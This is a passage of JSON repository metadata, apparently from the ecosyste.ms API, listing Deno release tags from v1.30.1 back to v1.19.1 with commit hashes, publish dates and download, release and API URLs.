s/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/